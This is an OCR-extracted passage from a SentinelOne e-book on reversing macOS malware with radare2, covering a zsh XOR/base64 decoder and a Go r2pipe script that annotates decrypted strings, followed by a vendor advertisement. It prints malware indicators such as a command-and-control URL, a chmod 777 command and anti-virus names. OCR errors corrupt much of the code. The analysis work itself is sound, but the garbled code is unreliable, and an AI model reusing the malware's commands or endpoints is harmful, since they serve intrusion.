a hard coded XOR key. In this case, the XOR key is 0x30. 


[@x10001eb50] 


, 0x30 


Once we have determined the XOR key, there’s various simple ways to decrypt a given string or even 
the whole binary (e.g., cyberchef, or writing your own decryption function as we saw in Chapter 3), 
but our eventual aim is to add comments to the disassembly (as well as learn a few useful tricks), so 
we'll take a different approach. 


Note that radare2 comes with a useful little tool called rahash2, which among other things, can 
decrypt strings. Here’s an example you can run on the command line: 


% rahash2 -D base64 -s 'H1JZXh9cUUVeUTHTRFw=' | rahash2 -D xor -S @x3@ - 
/bin/launchct1l% 


As we discussed in the previous chapter, we could easily make this into a function in our .zshrc file. 
However, one drawback with that approach is r2 won’t let us call such functions from the r2 prompt. 


Calling rxorb from 
within r2 to decrypt 
individual strings 


We can solve that by creating a standalone executable and saving it in our path, like so: 


#!/bin/zsh 
if [ "S#" -eq 2 ]; then 
echo S(rahash2 -D xor -S $1 -s $2) 
elif [ "S#" -eq 3 ]; then 
echo S(rahash2 -D base64 -s $3 | rahash2 -D xor -S $2 -) 
elif [ "S#" -eq 1 ]; then 
echo " 
# USAGE: 
# rxorb 
# rxorb @x3@ "\|YRBQBI" 
# Use '-b' to base64 decode the string before the xor 
# rxorb =e Q@x30 
FXAffFISQLFCSR98UUVeUThxV1VeREMFF XAeQF xZQ0Q= 
else 
echo "INPUT ERROR, type "rxorb help' for help." 
fz 


Saving this as /usr/local/bin/rxorb and giving it executable permissions (e.g., viachmod +X) 
will now make this available to us both on the command line and from within r2, once we open a new 
shell and new r2 session. 


!rxorb @x30 cVSEWR1ImWUJFQw== 
Anti-Virus 
1 !rxorb 0x30 Z1VSQLOTRA== 
Webroot 
[x1 !Irxorb -b 8x30 dWNIZA== 
ESET 
!rxorb -b @x30 YUVZU1sQeFVRXA== 


Quick Heal 


[ !rxorb -b 0x30 ZEJVXLROWVNCXw== 

TrendMicro 

[8x1 !rxorb -b 0x30 WEREQAofHOJDBgReQlweWVSWXxSCVVFUUUVEX1 LAHKBYQA9AQ 1 VWWUgNRUBUCg== 
http://rs64nrl.info/readautoip. php?prefix=upd: 


Great, we now have a general string decryption tool that we can feed a string, a key and cipher text 
and we are able to specify whether the cipher needs to be base64 decoded before being XOR’d with 
the given key. This alone will take care of a lot of use cases! 


However, while this works well for manual decryption, it becomes tedious for anything more than a 
few strings. What would be much better is if we could simply type one command that would iterate 
over encrypted strings in the binary and either print out all the decrypted text or comment the code 
where the string is referenced. Ideally, our solution should give us the option to do both. 


Let’s see how we can implement that by leveraging radare2’s scripting engine, r2pipe (aka r2p). 


SENTINELONE E-BOOK 


Building the Script 


We'll call the Go program “decode.go”, and the first part of it requires importing the r2pipe 
package from github. 


package main 


import ( 
u fmt u 
"github.com/radareorg/r2pipe-go" 
) 
var r2p, _ = r2pipe.NewPipe("") // Declare r2p as a global 


func check(err error) { 
if err != nil { 
panic(err) 


} 


After the imports, we declare a global variable r2p, which provides a pipe to the r2 instance when 
we Call it from within an r2 session. This global will allow us to send and receive commands to the r2 
session. We also implement a generic error function for use throughout the code. 


Next, we’ll implement a decrypt function. We could (and probably should) write a native version of 
this, but since we already have a decrypt function using rahash2 above, we'll reuse that. This will 


also allow us to see and solve some other common challenges we might face in other scenarios. 


func decryptStrAtLoc(loc string, key string) { 


bytes := fmt.Sprintf("ps @ %s", loc) // [1] 
str, err := r2p.Cmd(bytes) 
check(err) 


decodeCmd := fmt.Sprintf("!rxorb -b %s %s > /tmp/rxorb.txt", key, str) 
ff [2] 
r2p .Cmd(decodeCmd) 


The decryptStrAtLoc() function does most of the work in our program. As parameters, it takes 
an address and the XOR key. We’ve chosen not to return the decrypted string to the caller but instead 
consume it within the function. We'll see why shortly. 


For each command we want to pass to the r2 session, we first format the command as a string, then 
pass the command to r2p. Thus, [1] formats a command that returns the bytes at the current address 
as a string. At [2], we format a command that decodes the string by passing it to the rxorb utility we 
wrote earlier. 


As r2pipe’s Go implementation doesn’t support easy capture of stderr and stdout, we write this to 
a temporary file, which we'll consume in the next part of the code. Had we chosen to implement the 
XOR decryption natively in our code, we could have avoided that, but seeing how to deal with stdout 
when using r2pipe and Go is a useful exercise for other scripts. 


A SECURITY PRACTITIONER’S GUIDE TO REVERSING MACOS MALWARE WITH RADARE2 65 


SENTINELONE E-BOOK 


<pre> 
func writeCommentAtLoc(loc string) { 
readCmd := fmt.Sprintf("CCu “!cat -v /tmp/rxorb.txt | sed 's/\\ 
C.*\V\)/\"A\\I\"/g'* @ %S8", loc) 
r2p .Cmd(readCmd ) 


Our decoded string is now sitting in a file in /tmp. In the function above we do two things with 
one command: we read the string into a buffer and we write it out as a comment at the 
disassembly address in the file under analysis. The sed code is another work around for wrapping 
the string in quotes so that any special characters in the string do not get interpreted by the r2 shell 
when we pass it back. 


func printCommentAtLoc(loc string) { 
pdCmd := fmt.Sprintf("pd 1@%s", loc) // [3] 
pdStr, _ := r2p.Cmd(pdCmd) 
fmt .Println(pdStr) 


We next implement a function that will print out the disassembly along with the commented 
string to the r2 prompt. At [3], the pd 1 command tells r2 to print one line of disassembly from the 
given address. 


Finally, we implement our main() function that will call all this code as well as handle cleaning up the 
temporary file now that we’re done. 


func main() { 


key := "@x30" 

addr, err := r2p.Cmd("s") // [4] 's' = return current 
address 

check(err) 


decryptStrAtLoc(addr, key) 
writeCommentAtLoc(addr) 
printCommentAtLoc (addr) 


delCmd := fmt.Sprintf("!rm /tmp/rxorb.txt") // clean up the temp file 
r2p .Cmd(delCmd) 
if é6rr l= nil 4 

fmt .Printin(err) 


} 
defer r2p.Close() 


Note that at [4], due to the simplicity of the command, we just supplied the command directly to 
r2p.Cmd rather than format a separate string. The entire script can be found here. 


A SECURITY PRACTITIONER’S GUIDE TO REVERSING MACOS MALWARE WITH RADARE2 66 


Using the Script 


To use the script, build the decode.go program and take a note of the output path. Open an r2 session 
with the target binary and at the prompt type: 


#!pipe /usr/local/bin/godec/decode # change the path to suit 


If you hit return now, you'll likely see an error and then some disassembly. 


‘ #!pipe /usr/local/bin/godec/decode 
sed: RE error: illegal byte sequence 


int main (uint32_t argc, char **str); 


2 (vars 0, args 2) 
® (vars 0, args 0) 
® (vars 0, args 0) 


The script returns 
an error from sed 


That’s because we have executed the script while located at an address that does not contain any 
strings to consume. Let’s find an encrypted string and try again. The r2 command izz~== will output 
any strings in the binary that contain “==” — acommon padding for base64-encoded strings. 


: int main (uint32_t argc, char **str); 

: 2 (vars 8, args 2) 

: @ (vars 6, args 6) 

: © (vars 8, args 8) 

55 rbp 
1Z22—s8 

318 6x@@016927 6x106016927 8 9 3.__TEXT.__cstring ascii HLFAQA== 
323 OxO0G16bdb Ox19G016bdb 646 641 3. TEXT. cstring ascii DAS IXVwQRLVCQ11 FXEGSAR4SAENBVXINTVF LeVwOSZh 
SOZHQQYHxSY2QQAR4AHx91 fhIQELHEREAKHxSHROceUUBAXFUeU 1 SdH3RkdEMfYEJ fQFVCRE Ll 8WUNEHQEeABSURFQSDj O6EDEBCWUNEEEZVQKNZX14 
QDENEQL LeVw4VcAwfQORCWVSXDj OGEBAQEAxDVUKOe 1VVQHF CWUZVDBSDVUKOPT OQEBAQDF ZRXENVHwW4 SONAQEBAMW1VJ DmJ FXNFETFORVAWTW1V_ 
SQ490hAQEBAMWVS EVVdVQg 4VVAw fWVS EVVdVQg 4 SOHAQEBAMW1V J Dn VIWURKWV1Vf OVEDBSbVUKOPToQEBAQDF leRFVXVUIOAAWfWVSEVVdVQg49C 
EJZXLCOPTOMHIRZUBQOPT OMHOBCWUNEDg== 
325 @x66616e8d 6x166616e8d 8 9 
328 O8x888l6ebd GxleEBlbebd 12 


3 TEXT.__cstring ascii XFORVA== 

3 
329 6x66616eca 6x166816eca 24 3 

3 

3 

z 


TEXT. _cstring ascii YEJTVEIRXQ== 

TEXT.__cstring ascii YES fV8IRXXFCVOVdVVSEQw== 

TEXT.__cestring ascii WEREQAofHxVwH1FAWRSVR LVeRBSAWVSXHKBYQA== 
TEXT.__cstring ascii XF LeWwe= 

TFX¥T ectring aceii ¥1FAVNs= 


331 6x06016f24 6x190016f24 46 
336 6x66616f7d 6x166616f7d & 


Executing izz~== 227 AVARAIATAR AYIAARIBEAR A 
at the r2 prompt 


Let’s seek to location 0x100016bdb to test our decryption program. 


[0x100002937]> 
[@x100016bdb] > 1 C ecode 
;-- str. DAIIXVWwQRLVCQ11FXg HBVXLNFVF LeVwOSZWR2HQgSDw490gwRdH9zZG1g 
dRBAXF LDRBBgZXJ 8eXMQENGFH3FAQFxXVHx9OZHQQYHx5Y2QQAR4AHx91 FHIQE LAEREAKHx9HROCeUUBAXFUe 
U19SGH3RKGEMTFYEJ FQFVCRE 1 8WUNEHQE@ABSURFQSDj O6DEBCWUNEEEZVQKNZX14NEgEeCABIOPTOMVFLTRA49 
OHAQEBAMW1VJDnxRU1LVcCDB9DVUKOPTOQEBAQDENEQ1 LeVw4VcAwfQORCWV5XDj O6EBAQEAXbVUKOe 1VVQHF Cc 
WUZVDB9DVUKOPTOQEBAQDFZRXENVHW490hAQEBAMW1V J DmJ FXnFETFORVAWTW1VIDj OGEBAQEAXEQKVVHW49 
OhAQEBAMW1VJ DmNEUUJ EeVSEVUJ GUVWMH1ItVSQ490hHAQEBAMWVSEVVdVQg4VVAWTWVS5EVVdVQg490hAQEBAM 
W1VJ DnVIWURKWV1VfOVEDB9DVUKOPTOQEBAQDF LeRFVXVUIOAAWTWVS5EVVdVQg490hAQEBAMW1VJ DmBCX1dC 
UVOMH1tVSQ490HAQEBAMQORCWV5XDhVWwDB9DREJZX1LCOPTOMHIRZUQQOPTOMHOBCWUNEDE: 

©x100016bdb String “DASITXVwQR1VCQ11fXgOSAR4AENBVXLNFVF LeVwOSZWR2HQg 
SDw490gwRdH9zZG1gdRBAXF LDRBBgZXJ 8eXMQENHOTH3 FAQFxVHx9OZHQQYHXSY2QQAR4AHx91FHIQELHEREA 
KHx9HROceUUBAXFUeU19dH3RkdEMFYEJ FOFVCRE LSWUNEHQEeABSURFQSDj O6DEBCWUNEEEZVQKNZX14NEgE 
eABIOPTOMVF LTRA490HAQEBAMW1VJ DnxRULVcDB9DVUKOPToQEBAQDENEQ1 LeVw4VcAwf QORCWV5XDj O6EBA 
QEAxbVUkOe 1VVQHF CWUZVDB9bVUKOP ToQEBAQDFZRXENVHw4 SOHAQEBAMW1VJ DmJ FXnFEfFORVAWFW1VJDj0 
6EBAQEAxEQKVVHw4 SOhAQEBAMW1VJ DmNEUUJ EeVSEVUJ GUVwMH1tVSQ490hAQEBAMWVSEVVdVQg4VVAwfWV5S 
EVVdVQg4 90hAQEBAMW1VJ DnVIWURKWV1Vf OVEDB9DVUKOPToQEBAQDF LeRFVXVUIOAAWFWVS5EVVdVQg490hA 
QEBAMW1VJ DmBCX1dCUVOMH1tVSQ490hAQEBAMQORCWVS5 XDhVwDB9DREJZX1LCOPTOMHIRZUOQOPToOMHOBcWUN 
EDg=="_; Len=641 ; "<?xml version="1.0" encoding="UTF-8"2?>°M <!DOCTYPE plist PUBLIC 
"-//Apple//DTD PLIST 1.0//EN" “http://www.apple.com/DTDs/PropertyList-1.0.dtd">*M <p 
list version="1.0">*°M <dict>“M <key>Label</k" 
[9x100016bdb] > 


We can see that our decoder has appended a comment containing the decrypted string, which looks 
like the beginning of a LaunchAgent or LaunchDaemon plist. Great! Let’s try again, this time feeding it 
all the strings that contain “==” in one go. Try this: 


#!pipe /usr/local/bin/godec/decode @@=*izz~==[2]° 
Here’s an example of the output: 


0x100017356 tring “dl HLJEFICEGPSYAOQFXVWFu=** ; Lens41 ; “File is not ONG or ZIP: ‘Ke'* 
== str. RULDWV9ONUNVRE 
ODE XREF from str.F 
1000174b8 strin VS OdeXFORVA*#" ; Lene29 ; “vision-set,. download” 
str WEREQAOTHxVWH1 
ODE XREF from str 
8x160017509 string “W NVXFXTHKRIRAS=" ; Len=29 ; “http: //*e/hello.txe” 
‘ str, WOVDQN9 SWV4 IXGBY: 
100B175ab string OSWVATXOUVXE } lene21 */usr/bin/open® 
str MLIZXNOTWELIVBAN 
ODE XREF from str (x 
0017507 string “Hi ITVBANBWCQFKVWiwee" ; lene29 ; */bin/chmod 777 ‘xe'" 
OVOON9 SWV4 THERZRUR 
string "HOVDQH9SWV4TWERZRURZXAW®" ; lene2S ; ‘/usr/bin/bdiutil® 


string -" s lened ; "info" 
WVLAVLUAQFFEWA 
7741 string * ; lene17 ; *image-path* 
-" 5 leneo + *.deg* 


Lene9 it .aip* 


XkpZOBAGXKAVCA 


} i SH LEVVI X110 xs 
Hla string “U1QQFXATCK NCH OFXKpZQBAd * 5 Lene42 ; “cd 0/; /usr/bin/unzip «o 0" 
GLICVVZISA 

*Firefox* 


"Vivaldi* 
; “Aviator* 
* ; lenei7 y “AntieVir 


“1) i *Webroot* 
str. awylzAa 
7930 4 ZAun* ; LS ; *ESET* 
YUVZU 1 SQeFVRXA 
799b string *Y "+ lenwt7 : "Quick Heal* 
= str. ZEIVXLROWVNCXW 
DE XREF from str 
017903 string “ZEJVX VN “" } lene17 *TrendHicro” 
str ULNRXLSVXA 
«100017055 String "UINRXLSVXAs*" ; “13 ; "channel* 


At this point, since the #! pipe command is awkward to remember and type out every time, you 
might want to create an alias and/or macro for that. 


SENTINELONE E-BOOK 


Sdec=#!pipe /usr/local/bin/godec/decode 
(script x; #!pipe S$@) 


The Sdec alias allows us to call this particular script easily, while the script macro allows us to pass in 
any script path as an argument to the #! pipe command. 


Note that we didn’t decode all encrypted strings in the binary. We could iterate over all strings 
(including non-encrypted ones) with something like Sdec @@=*izz~cstring’, but that will lead to 
errors. The right way to approach this would be to add code to our program that determines whether 
the string at the current address is a valid base64 encoded string or not. We'll leave that as an exercise 
for the reader. 


Our script could also do with some other improvements: passing the key as an argument would make 
it more reusable, and of course, there are many points where we lazily use r2 to shell out rather than 
using Go’s own os package, but for now, this simple script will handle the job it was intended for and 
is simple to repurpose or build on. 


Running a Script Without an 
Interactive radare2 Prompt 


Sometimes you just need to run a script and get the results without needing an interactive r2 prompt. 
You can tell r2 to execute a script on a binary, either before or after loading the binary, with the -i and 
-I flags, respectively. The -g option will tell r2 to quit after running the script. 

r2 -Iq <script file> <binary> 

You can also do the same thing with commands, aliases and macros directly without using a script, 
using the -c option. For example, this will print out the result of the meta macro without leaving you 


in an r2 session: 


r2 -qc ".(meta)" /bin/ls 


A SECURITY PRACTITIONER’S GUIDE TO REVERSING MACOS MALWARE WITH RADARE2 69 


10 


SENTINELONE E-BOOK 


Batch Processing Files with a radare2 Script 


If you want to process a number of files without having to start an r2 session for each one, you can 
pass the file path to your script as an argument when you call r2pipe as follows: 


func main() { 
args := os.Args 
if len(args) < 2 || len(args) > 2 { 
fmt.Printf( "Usage: Provide path to a binary.") 
os.Exit(1) 


argPath := os.Args[1] 

r2p, err := r2pipe.NewPipe(argPath) 
check(err) 

defer r2p.Close() 

r2p.Cmd("aaa") // run analysis 


// do your stuff 
// write results to file or stdout 
You can now process all files in a folder from the command line with something like: 


% for iin ./*; do my_r2pipe_script $i; done 


Summary 


In this chapter, we’ve learned a number of useful skills. We’ve seen how to automate tasks like 
grabbing disassembly, adding comments, and decoding strings, and we have navigated some of the 
complexities of dealing with stdout when using Go to drive r2pipe. 


We've looked at how to pass file paths as arguments and how to run scripts, commands and macros 
without opening an interactive radare2 session. 


Postscript 


With a good understanding of the r2 commands explored throughout this eBook, you should now be 
able to readily adapt these skills to other automation tasks. For further reading, consult the resources 
listed in the next section, and don’t forget to follow the SentinelLabs and SentinelOne blogs for regular 
new content on macOS malware, threats, and reverse engineering tips. You can follow me, ask me 
questions or just keep up with macOS malware on social media here, here, here, and here. 


Thanks for reading and happy macOS malware reversing! 


A SECURITY PRACTITIONER’S GUIDE TO REVERSING MACOS MALWARE WITH RADARE2 70 


i 


References and Further Reading 


R2pipe — The Official Radare2 Book 
Radare2-r2pipe-api repository 

Radare2 Python Scripting 

Automating RE Using r2pipe 

Decrypting Mirai configuration With radare2 
Running r2Pipe Python in batch 


Scripting r2 with Pipes 


Tomorrow’s Threats Require a New 
Enterprise Security Paradigm 


SentinelOne provides one platform to prevent, detect, respond, and hunt ransomware across all 
enterprise assets. See what has never been seen before. Control the unknown. All at machine speed. 


(@) Autonomous 
<2’ EPP + EDR 


Real-time detection and remediation of 
modern attacks at the endpoint, at machine 
speed, and without human intervention. 


G2 Frictionless 
Y= Threat Resolution 
Patented Storyline™ enables 1-click remediation 
and rollback to accelerate recovery to 

real-time. Storyline Active Response or STAR™ 
provides proactive detection and response. For 
threat hunters and responders, remediation is 
integrated as a standard EDR response. 


<> Unprecedented 
= Visibility 


Contextualize and identify threats in real-time. 
Storyline™ technology reduces manual effort 
and automatically strings together related 
events in an attack storyline. 


oSo Simplified 
°o° Experience 


One agent consolidates security functions 

and reduces agent count. One console unfies 
administration of devices and cloud workloads. 
Fast to deploy. Easy to manage. 


-o- Exceptional SentinelOne 
() Customer Experiences Vigilance 


Customers are our #1. The proof is in our high 
customer satisfaction ratings and net promoter 
scores that rival the globe’s best companies. 


Visit the SentinelOne website for more details, 
or give us a call at +1-855-868-3733 


Get answers, not alerts, with our managed 
detection, investigation and response service. 


Get a Free Demo 


Innovative. Trusted. Recognized. 


rik) i 
=e | hed 1sO 27007 


gam / 
@ }H CERTIFIED 
~ schellmar 


TEVORA 


PCI DSS Attestation 
HIPAA Attestation 


HP SSencenurry. peerin 


49 kk kkk 


Gartner. 


A Leader in the 2021 Magic Quadrant 
for Endpoint Protection Platforms 


Record Breaking ATT&CK Evaluation 98% of Gartner Peer Insights™ 
Voice of the Customer Reviewers 


recommend SentinelOne 


+ No missed detections. 100% visibility 
+ Most Analytic Detections 2 years running 
+ Zero Delays. Zero Config Changes 


Highest Ranked in all Critical 
Capabilities Report Use Cases 


((\)) SentinelOne 


Contact us 


sales@sentinelone.com 
+1-855-868-3733 


About SentinelOne 


More Capability. Less Complexity. SentinelOne is pioneering the 
future of cybersecurity with autonomous, distributed endpoint 
intelligence aimed at simplifying the security stack without 
forgoing enterprise capabilities. Our technology is designed to 
scale people with automation and frictionless threat resolution. 

Are you ready? 


sentinelone.com 


A_Security_Practitioners_Guide_to_Reversing_macOS_Malware_with_Radare2_092023 


© SentinelOne 2023 


